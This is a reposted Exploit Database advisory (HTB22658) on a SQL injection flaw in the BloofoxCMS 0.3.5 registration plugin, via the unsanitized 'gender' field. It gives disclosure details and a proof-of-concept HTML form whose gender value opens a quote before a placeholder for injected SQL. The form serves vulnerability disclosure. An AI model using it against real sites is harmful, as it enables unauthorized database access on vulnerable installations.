BloofoxCMS Registration Plugin – SQL Injection

• Exploit Database
• 11 阅读

• 作者： High-Tech Bridge SA
  日期： 2010-10-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15328/

• Vulnerability ID: HTB22658
  Reference: http://www.htbridge.ch/advisory/sql_injection_in_bloofoxcms_registration_plugin.html
  Product: BloofoxCMS 
  Vendor: bloofox.com ( http://bloofox.com/ ) 
  Vulnerable Version: 0.3.5 and probably prior versions 
  Vendor Notification: 13 October 2010 
  Vulnerability Type: SQL Injection
  Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
  Risk level: High 
  Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 
  
  Vulnerability Details:
  The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in gender variable.
  
  The following PoC is available:
  
  
  <form action="http://host/index.php?page=8" method="post">
  <input type="hidden" name="un" value="testuser">
  <input type="hidden" name="pwd" value="123456">
  <input type="hidden" name="pwd2" value="123456">
  <input type="hidden" name="em" value="email@email.com">
  <input type="hidden" name="gender" value="'SQL_CODE_HERE">
  <input name="send" value="Register & Create Account" type="submit">
  </form>